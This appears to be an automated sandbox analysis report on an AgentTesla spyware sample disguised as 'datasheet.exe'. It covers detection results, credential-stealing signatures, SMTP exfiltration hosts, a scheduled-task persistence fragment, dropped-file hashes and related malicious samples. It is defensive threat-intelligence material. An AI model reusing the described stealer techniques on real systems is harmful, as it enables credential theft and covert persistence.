                            network: smtp.yandex.ru 77.88.21.158, 49714, 49724, 49747 YANDEXRU Russian Federation; api.ipify.org 104.26.13.205, 443, 49711, 49716 CLOUDFLARENETUS United States
                            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access)
                        powershell.exe
                            signatures: Loading BitLocker PowerShell Module
                            WmiPrvSE.exe
                            conhost.exe
                        2 other processes
                            conhost.exe
                            conhost.exe

                    Source | Detection | Scanner | Label | Link
                    datasheet.exe | 55% | ReversingLabs | ByteCode-MSIL.Packed.Generic |
                    datasheet.exe | 100% | Avira | HEUR/AGEN.1305393 |
                    datasheet.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | 100% | Avira | HEUR/AGEN.1305393 |
                    C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe | 55% | ReversingLabs | Win32.Trojan.Generic |

                    No Antivirus matches

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    http://crl.gl | 0% | Avira URL Cloud | safe |
                    http://crl.globalsig | 0% | Avira URL Cloud | safe |
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    smtp.yandex.ru
                    77.88.21.158
                    truefalse
                      high
                      api.ipify.org
                      104.26.13.205
                      truefalse
                        high
                        smtp.yandex.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://account.dyn.com/ | datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | - | high
https://api.ipify.org/t | RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.gl | RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616412400.000000000602B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | datasheet.exe, 00000000.00000002.2187514566.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, EhzaIxEFbjyd.exe, 0000000B.00000002.2236785446.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.globalsig | RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://smtp.yandex.com | RegSvcs.exe, 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003294000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000322A000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
77.88.21.158 | smtp.yandex.ru | Russian Federation | 13238 | YANDEXRU | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1559979
                                      Start date and time:2024-11-21 09:01:09 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 40s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:datasheet.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@21/15@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 187
                                      • Number of non-executed functions: 12
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • VT rate limit hit for: datasheet.exe
Time | Type | Description
03:02:01 | API Interceptor | 3x Sleep call for process: datasheet.exe modified
03:02:04 | API Interceptor | 30x Sleep call for process: powershell.exe modified
03:02:06 | API Interceptor | 3x Sleep call for process: EhzaIxEFbjyd.exe modified
03:02:07 | API Interceptor | 9920032x Sleep call for process: RegSvcs.exe modified
09:02:05 | Task Scheduler | Run new task: EhzaIxEFbjyd path: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
77.88.21.158 | datasheet.exe | malicious | AgentTesla | -
77.88.21.158 | 0zu73p2YBu.exe | malicious | Chrome Password Stealer, Fox Password Stealer, Opera Password Stealer | -
77.88.21.158 | BWr9qnCU8X.exe | malicious | Unknown | -
77.88.21.158 | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla | -
77.88.21.158 | DHL Delivery Invoice.com.exe | malicious | AgentTesla | -
77.88.21.158 | Transferencias6231.vbs | malicious | AgentTesla, GuLoader | -
77.88.21.158 | Justificante de pago.vbs | malicious | AgentTesla, GuLoader | -
77.88.21.158 | Justificante de pago.vbs | malicious | AgentTesla, GuLoader | -
77.88.21.158 | TRANSFERENCIA BANCARIA.vbs | malicious | AgentTesla, GuLoader | -
77.88.21.158 | xBneIooWzQjjOOg.exe | malicious | AgentTesla | -
104.26.13.205 | 2b7cu0KwZl.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.13.205 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
smtp.yandex.ru | datasheet.exe | malicious | AgentTesla | 77.88.21.158
smtp.yandex.ru | 0zu73p2YBu.exe | malicious | Chrome Password Stealer, Fox Password Stealer, Opera Password Stealer | 77.88.21.158
smtp.yandex.ru | BWr9qnCU8X.exe | malicious | Unknown | 77.88.21.158
smtp.yandex.ru | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla | 77.88.21.158
smtp.yandex.ru | DHL Delivery Invoice.com.exe | malicious | AgentTesla | 77.88.21.158
smtp.yandex.ru | Transferencias6231.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
smtp.yandex.ru | Justificante de pago.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
smtp.yandex.ru | Justificante de pago.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
smtp.yandex.ru | TRANSFERENCIA BANCARIA.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
smtp.yandex.ru | xBneIooWzQjjOOg.exe | malicious | AgentTesla | 77.88.21.158
api.ipify.org | datasheet.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 104.26.12.205
api.ipify.org | https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.html | malicious | Gabagool | 104.26.12.205
api.ipify.org | https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com | malicious | Unknown | 104.26.12.205
api.ipify.org | IBKB.vbs | malicious | AgentTesla, DBatLoader, PureLog Stealer | 172.67.74.152
api.ipify.org | order and drawings_pdf.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | vessel details_pdf.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | QuarantineMessage.zip | malicious | Unknown | 172.67.74.152
api.ipify.org | https://hmjpvx0wn1.gaimensebb.shop/ | malicious | EvilProxy, HTMLPhisher | 104.26.13.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
YANDEXRU | datasheet.exe | malicious | AgentTesla | 77.88.21.158
YANDEXRU | 0zu73p2YBu.exe | malicious | Chrome Password Stealer, Fox Password Stealer, Opera Password Stealer | 77.88.21.158
YANDEXRU | BWr9qnCU8X.exe | malicious | Unknown | 77.88.21.158
YANDEXRU | Unit 2_week 4 2024.pptx | malicious | HTMLPhisher | 77.88.21.90
YANDEXRU | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla | 77.88.21.158
YANDEXRU | https://vivantskincare.taplink.ws | malicious | HTMLPhisher | 93.158.134.119
YANDEXRU | DHL Delivery Invoice.com.exe | malicious | AgentTesla | 77.88.21.158
YANDEXRU | https://sites.google.com/view/we2k-/home | malicious | Unknown | 87.250.250.119
YANDEXRU | Cursor Commander.exe | malicious | Unknown | 213.180.204.90
YANDEXRU | SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exe | malicious | Unknown | 213.180.193.14
CLOUDFLARENETUS | datasheet.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | ORDER 20240986 OA.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | Secured Audlo_secpod.com_1524702658.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 188.114.97.3
CLOUDFLARENETUS | https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg== | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | ArchivoNuevo.msi | malicious | Unknown | 162.159.140.238
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | ibk0BQaWAo.exe | malicious | Unknown | 188.114.97.6
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | datasheet.exe | malicious | AgentTesla | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | ORDER 20240986 OA.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | PO#8329837372938383839238PDF.exe | malicious | XWorm | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | https://ollama.com/ | malicious | Unknown | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | z1Tender_procurement_product_order__21_11_2024_.vbs | malicious | FormBook, GuLoader | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | ArchivoNuevo.msi | malicious | Unknown | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | https://tally.so/widgets/embed.js | malicious | Unknown | 104.26.13.205
                                                          No context
                                                          Process:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2232
                                                          Entropy (8bit):5.380747059108785
                                                          Encrypted:false
                                                          SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                                                          MD5:4D3B8C97355CF67072ABECB12613F72B
                                                          SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                                                          SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                                                          SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                                                          Malicious:false
                                                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1599
                                                          Entropy (8bit):5.102789187578615
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLFDxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTp9v
                                                          MD5:B8CE8321CED1114E38C26BB351E00C6C
                                                          SHA1:FBAAF6F8D39F4E713D384C49B47706BF3FA78FBF
                                                          SHA-256:16D9DCCC1CB4323DFCCA42E7F20E5C0D74F9B0E149A4CBAC5A3D47854315538B
                                                          SHA-512:15388B115C1F50AF55AB25DA75841E4610BE7F34B7A470C7924A93DBAFA729651B6F69D7A2D0E86BCAD37E3C1D4AF12CE27474E5BBC1CB4B3E186D3143B0A64E
                                                          Malicious:true
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                          Process:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1599
                                                          Entropy (8bit):5.102789187578615
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLFDxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTp9v
                                                          MD5:B8CE8321CED1114E38C26BB351E00C6C
                                                          SHA1:FBAAF6F8D39F4E713D384C49B47706BF3FA78FBF
                                                          SHA-256:16D9DCCC1CB4323DFCCA42E7F20E5C0D74F9B0E149A4CBAC5A3D47854315538B
                                                          SHA-512:15388B115C1F50AF55AB25DA75841E4610BE7F34B7A470C7924A93DBAFA729651B6F69D7A2D0E86BCAD37E3C1D4AF12CE27474E5BBC1CB4B3E186D3143B0A64E
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):651776
                                                          Entropy (8bit):7.975503153184261
                                                          Encrypted:false
                                                          SSDEEP:12288:NyAgFdVoC/HeIMOBkXKxh3IfDj3oSPYzeyu0Lu/bs1D0bWCiYNR/WBS9vD:wAgVoC/HemBNheP3Xg6yTLug0WC7ROB0
                                                          MD5:4C7E7BD9EAF56B3936BE87A6904F70F8
                                                          SHA1:22591D29813790D622A1D49A1E0BF91B20235CF6
                                                          SHA-256:429E0FA9706EE65774188E538BDA0B69A15FB93E97864CEDB88E33C650ED9538
